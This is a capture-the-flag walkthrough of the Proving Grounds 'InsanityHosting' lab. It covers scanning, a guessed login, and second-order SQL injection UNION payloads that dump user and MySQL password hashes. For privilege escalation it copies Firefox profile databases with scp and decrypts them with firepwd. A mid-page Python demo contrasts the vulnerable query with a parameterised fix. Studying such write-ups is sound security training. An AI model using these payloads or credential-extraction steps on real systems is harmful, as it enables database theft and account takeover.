PG - InsanityHosting

In this walkthrough, we will be going through the InsanityHosting room from Proving Grounds. This room is rated as Hard on the platform and consists of exploiting a second-order SQL injection in the application’s logic to get a user hash for the initial foothold. For privilege escalation, decrypting the Mozilla (Firefox) password database is required to get the root password. So, let’s get started without any delay.

InsanityHosting

Machine Info:

Title: InsanityHosting
IP address: 192.168.241.124
Difficulty: Hard
OS: Linux
Description: InsanityHosting is a Hard Linux machine which requires thorough exploitation of a second-order SQL injection in the application’s logic to get the user hash for the initial foothold. For the privilege escalation, decryption of the Mozilla DB is required to get the root password.

Enumeration:

  • I started off with my regular nmap aggressive scan and found 3 ports open – 21 (FTP), 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.241.124
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-15 22:45 IST

Nmap scan report for 192.168.241.124
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.45.185
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 85:46:41:06:da:83:04:01:b0:e4:1f:9b:7e:8b:31:9f (RSA)
|   256 e4:9c:b1:f2:44:f1:f0:4b:c3:80:93:a9:5d:96:98:d3 (ECDSA)
|_  256 65:cf:b4:af:ad:86:56:ef:ae:8b:bf:f2:f0:d9:be:10 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.2.33)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.33
|_http-title: Insanity - UK and European Servers
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Unix

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   189.71 ms 192.168.45.1
2   189.68 ms 192.168.45.254
3   190.48 ms 192.168.251.1
4   190.76 ms 192.168.241.124

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.08 seconds

nmap scan

port 80 open

  • I started my enumeration with port 21. Logged into the server using anonymous access, but was unable to find anything substantial. Tried to upload a test file to the server but did not have permission to do so.

$ ftp 192.168.241.124
Connected to 192.168.241.124.
220 (vsFTPd 3.0.2)
Name (192.168.241.124:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Apr 01  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> cd ..
250 Directory successfully changed.
ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> exit
221 Goodbye.

FTP Enumeration

  • Next, moved on to enumerate the web server on port 80. It reveals a static business website of a hosting company.

Business Website

  • Looked around and found a login page, but was not able to access it with common passwords.

Login panel

  • Fired gobuster on the target to reveal some hidden directories. Found some interesting ones in the results, like /news, /webmail and /phpmyadmin.

$ gobuster dir -u http://192.168.241.124/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.241.124/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/15 23:14:32 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 234] [--> http://192.168.241.124/js/]
/css                  (Status: 301) [Size: 235] [--> http://192.168.241.124/css/]
/img                  (Status: 301) [Size: 235] [--> http://192.168.241.124/img/]
/data                 (Status: 301) [Size: 236] [--> http://192.168.241.124/data/]
/news                 (Status: 301) [Size: 236] [--> http://192.168.241.124/news/]
/fonts                (Status: 301) [Size: 237] [--> http://192.168.241.124/fonts/]
/webmail              (Status: 301) [Size: 239] [--> http://192.168.241.124/webmail/]
/phpmyadmin           (Status: 301) [Size: 242] [--> http://192.168.241.124/phpmyadmin/]
/monitoring           (Status: 301) [Size: 242] [--> http://192.168.241.124/monitoring/]
/licence              (Status: 200) [Size: 57]
===============================================================
2024/01/15 23:21:25 Finished
===============================================================

gobuster scan

  • Accessed the /news directory. Seems like a corporate blog. Nothing fancy, but it does reveal a username – otis.

Corporate blog

  • Next, moved to the next juicy directory, /phpmyadmin. Tried to log into it using default creds but was unable to do so.

phpmyadmin login

  • Moving on to the /webmail directory. This reveals another login panel and the running SquirrelMail version – 1.4.22.

Squirrel Mail version - 1.4.22

  • Looked for any known exploit for the version in question and found an RCE exploit (CVE-2017-7692). However, it still requires valid credentials.

CVE-2017-7692

  • Back to the login page on the main website, we now know a username from the blog section. So, I tried common passwords for user “otis” and got a hit with “123456”.

  • Once logged in, we can see that it is some kind of a dashboard where we can check the status of the running hosts.

Insanity Hosting backend

  • Tried the same creds on webmail instance and it worked there as well.

Webmail backend

  • Back to our earlier found exploit, I tried to get a shell using it, but it failed.

Firing the exploit

  • Now the last thing we have here is the server status dashboard. I added a host in the application. Surprisingly, we also got an email in our mailbox from the monitor@instanityhosting.vm address stating that the test host we entered is down. Interesting!

Server status

Initial Access:

  • Looking carefully at the mail body reveals some fields that look like they have been pulled from a SQL database. This indicates that the application might be vulnerable to a second-order SQL injection here: the host name is stored safely at first, but is later reused in another query whose result ends up in the mail.

Mail in inbox
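To make the mechanism behind this concrete, here is an added example (not code from the page or from the Proving Grounds machine): a toy Python/sqlite3 stand-in for the monitoring app, where the stored host name is later interpolated into a second query, shown beside the parameterised version and a hostname validator at the storage boundary. Table names, sample users, hashes and addresses are all constructed, and because the toy uses single-quote string delimiters the write-up’s payload quote is adapted to match.

```python
import re
import sqlite3

# Host name submitted through the "add host" form. The stored value is later
# interpolated into a second query, which is where the injection fires.
# Payload shape mirrors the write-up's 4-column UNION; the quote character is
# adapted to this toy's single-quote delimiters.
MALICIOUS_NAME = "admin' UNION SELECT id,username,password,email FROM users-- -"

# DNS-shaped host names only (labels of 1-63 chars, total <= 253).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def build_db():
    """Constructed in-memory stand-in for the 'monitoring' database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT, email TEXT);
        CREATE TABLE hosts(id INTEGER PRIMARY KEY, name TEXT, address TEXT, status TEXT);
        INSERT INTO users VALUES (1, 'admin',    'HASH-PLACEHOLDER-1', 'admin@example.test');
        INSERT INTO users VALUES (2, 'nicholas', 'HASH-PLACEHOLDER-2', 'nicholas@example.test');
        INSERT INTO users VALUES (3, 'otis',     'HASH-PLACEHOLDER-3', 'otis@example.test');
    """)
    return conn


def add_host(conn, name, address):
    """First hop is parameterised, so nothing looks wrong at insert time."""
    conn.execute("INSERT INTO hosts(name, address, status) VALUES (?, ?, 'down')",
                 (name, address))
    conn.commit()


def report_vulnerable(conn):
    """Periodic check that re-reads each stored name and formats it into SQL.
    Trusting the stored value is what makes this a second-order injection."""
    rows = []
    for (name,) in conn.execute("SELECT name FROM hosts").fetchall():
        query = "SELECT id,name,address,status FROM hosts WHERE name = '%s'" % name
        rows.extend(conn.execute(query).fetchall())
    return rows


def report_safe(conn):
    """Same check with a bound parameter: the stored name is data, never SQL."""
    rows = []
    for (name,) in conn.execute("SELECT name FROM hosts").fetchall():
        rows.extend(conn.execute(
            "SELECT id,name,address,status FROM hosts WHERE name = ?", (name,)).fetchall())
    return rows


def validate_hostname(name):
    """Defence in depth at the storage boundary: reject anything not DNS-shaped."""
    return bool(HOSTNAME_RE.match(name))


def render_mail(rows):
    """Notification body like the monitor's mail; shows what would leak."""
    return "\n".join("host %s (%s) is %s" % (r[1], r[2], r[3]) for r in rows)


if __name__ == "__main__":
    db = build_db()
    add_host(db, "web01.example.test", "10.0.0.5")
    add_host(db, MALICIOUS_NAME, "10.0.0.6")   # validate_hostname() would reject this
    print("--- vulnerable report ---")
    print(render_mail(report_vulnerable(db)))
    print("--- parameterised report ---")
    print(render_mail(report_safe(db)))
```

In the vulnerable report the three user rows appear in the mail body in place of host rows, which is exactly the symptom seen in the inbox; the parameterised report only ever returns the two stored hosts.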

  • I intercepted the request to add a new host with Burp Suite. Sent it to Intruder, selected the target parameter and used the wfuzz sql_inj.txt wordlist as the payload list to start the attack.

Burpsuite POST request

selecting name parameter

/usr/share/wfuzz/wordlist/vulns/sql_inj.txt

setting the payload list

Attack started

  • We will now get a lot of emails; search through them. This might take a while, but we will get output like that below confirming the SQL injection.

Got result in emails

  • Next, we will enumerate the database name with the payload below. As per the result, we found the DB name “monitoring” and the username “root@localhost”.

admin" UNION SELECT NULL,NULL,user(),database()-- -

admin%22%20UNION%20SELECT%20NULL%2CNULL%2Cuser%28%29%2Cdatabase%28%29--%20-

injecting payload

Dumped DB name

  • Next, we will dump the table names from the default DB. As per the result, we got a lot of them. The interesting one to us is “users”.

admin" UNION SELECT table_name,NULL,NULL,NULL FROM information_schema.tables-- -

admin%22%20UNION%20SELECT%20table_name%2CNULL%2CNULL%2CNULL%20FROM%20information_schema.tables--%20-

injecting payload

Dumping Table names

Got users table

  • Next, we will dump the column names of the users table with the below payload. The result shows two interesting fields – username and password.

admin" UNION SELECT group_concat(column_name),2,3,4 FROM information_schema.columns where table_name = 'users' -- -

admin%22%20UNION%20SELECT%20group_concat%28column_name%29%2C2%2C3%2C4%20FROM%20information_schema.columns%20where%20table_name%20%3D%20%27users%27%20--%20-

injecting payload to dump columns

Dumping column names

  • At last, we will dump the contents of the username and password columns. As per the result, we found hashes for three users – admin, nicholas and otis.

admin" UNION SELECT id,username,password,email FROM users-- -

injecting payload to dump columns data

Dumping username & password columns

  • At this point, I tried to get access with the found password hashes but was unable to. So I went back to enumerate the other databases.

admin" UNION SELECT NULL,NULL,NULL,schema_name FROM information_schema.SCHEMATA-- -

Enumerating other DB

  • Dumped the user and password columns from the mysql.user table. Got the hashes for users root and elliot.

admin" UNION SELECT 1,user,password,authentication_string FROM mysql.user-- -

Dumping info from the mysql.user DB

  • I was able to crack the hash of the user elliot with hashes.com.

hashes cracked

  • Logged into the target via SSH using user elliot creds and captured the local flag.

got initial access

Privilege Escalation:

  • Looking inside elliot’s home directory reveals a Mozilla (.mozilla) directory.

ls -la

ls -la

  • We checked for the four files needed to decrypt the Mozilla password database (logins.json, cert9.db, cookies.sqlite and key4.db) and had read access to all of them.

ls .mozilla/firefox/esmhp32w.default-default | grep -E "logins.json|cert9.db|cookies.sqlite|key4.db"

got Mozilla DB

  • Transferred them to our local machine using scp.

scp -o StrictHostKeyChecking=no -r elliot@192.168.241.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/cert9.db .

scp -o StrictHostKeyChecking=no -r elliot@192.168.241.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/cookies.sqlite .

scp -o StrictHostKeyChecking=no -r elliot@192.168.241.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/key4.db .

scp -o StrictHostKeyChecking=no -r elliot@192.168.241.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/logins.json .

Transferring files to local system

  • I used the firepwd script to decrypt the DB and got the password of the user root.

python3 firepwd.py key4.db

cracking the DB

  • Finally, switched our user to root using the found password and captured the root flag to mark the machine as complete.

su root
S8Y389KJqWpJuSwFqFZHwfZ3GnegUa

proof flag

Conclusion:

So that was “InsanityHosting” for you. We started off with a regular nmap scan and found 3 ports open – 21 (FTP), 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found a static business website and a login page. Fired gobuster on the target and found a /news directory, which reveals a username – otis. Back at the login panel, tried common passwords with user otis and got lucky with 123456. Upon enumerating further, found out that the application is vulnerable to a second-order SQL injection attack, where we can store payloads in the backend and the result is returned as an error in the SquirrelMail webmail. Exploiting the same, dumped the contents of the mysql.user table. Cracked the dumped hashes and got initial access as user elliot via SSH. For the privilege escalation, decrypted the found Mozilla DB using firepwd to get the root password. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
